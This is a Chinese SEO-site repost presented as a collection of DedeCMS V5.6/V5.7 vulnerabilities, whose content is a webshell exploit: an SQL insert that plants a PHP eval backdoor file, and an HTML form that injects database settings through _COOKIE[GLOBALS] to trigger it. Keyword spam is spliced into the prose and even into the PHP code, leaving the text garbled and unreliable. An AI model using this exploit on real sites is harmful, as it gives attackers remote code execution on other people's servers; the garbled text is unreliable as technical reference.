Dedecms V5.6/V5.7漏洞问题收集总结,织梦技术
导读:织梦技术织梦技术昨天自己的一个网站中毒了,花了N天时间没有找出来,前天没事搜索了一下dedecms漏洞,结果发现V5.6/V5.7漏洞一堆一堆的,下面我收集了现在Dedecmsdede免费校板下战织梦模板免费。
DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)
前题条件,必须准备好自己的dede,然后插入数据:
以下是引用片段:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @("1.php"织梦模板, 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
以下是引用片段:
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /> <input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /> <input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> <input type="text" value="true" name="nocache" style="width:400"> <input type="submit" value="提交" name="QuickSearchBtn"><br /> </form> <script> function addaction() { document.QuickSearch.action=document.QuickSearch.doaction.value; } </script>
声明: 本文由我的SEOUC技术文章主页发布于:2023-07-19 ,文章Dedecms V5.6/V5.7漏洞问题收集总结,织梦技术主要讲述漏洞,标签,织梦网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_30981.html